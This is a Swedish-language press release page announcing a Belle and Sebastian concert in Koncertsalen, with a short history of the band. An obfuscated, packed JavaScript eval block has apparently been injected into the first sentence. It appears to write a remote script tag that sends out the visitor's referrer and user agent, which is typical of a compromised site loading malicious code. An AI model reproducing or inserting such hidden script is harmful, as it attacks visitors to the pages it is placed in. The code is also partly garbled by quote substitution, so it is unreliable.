Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Belle and Sebastian, Koncertsalen, Koncerthuset

Belle and Sebastian, Koncertsalen, Koncerthuset
Sebastian
Naivt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bsbyy|var|u0026u|referrer|idyif||js|php’.split(’|’),0,{}))
och ändå skarpsint, rått men hjärtligt. Det kontrastfyllda är den gemensamma nämnaren när Belle And Sebastian debuterar i Koncertsalen i sommar.
Det är nu 18 år sedan det skotska indiepop- bandet med det charmiga namnet Belle And Sebastian debuterade med ”Tigermilk”. Sedan dess har det varit som en musikalisk framgångssaga med en rad av kritikerrosade albumsläpp (trots genrens ofta hårda tider hos kritikerna), där samtliga har den naiva, vackra melodin och känslomässiga texten. Senaste släppet kom sommaren 2013, då Belle And Sebastian gav ut ”The Third Eye Center”, en samling av B-sidor och sällsyntheter.

Belle And Sebastian är uppkallad efter en känd fransk barnbok, och med det sagt har septetten kunnat kommunicera sin karriär och konstnärliga uttryck, musikaliskt såväl som visuellt, både lekfullt och naivt- med en glimt i ögat. Samtidigt har artistgruppen lyckats med att bibehålla den konstnärliga och litterära respekten, inte minst pga de nyanserade texterna av- och med gruppens frontman Stuart Murdoch. När Belle And Sebastian besöker Koncertsalen i sommar, är det den första gången gruppen får prova sina krafter i Jean Nouvels världsberömda våning.

Detta är ett pressmeddelande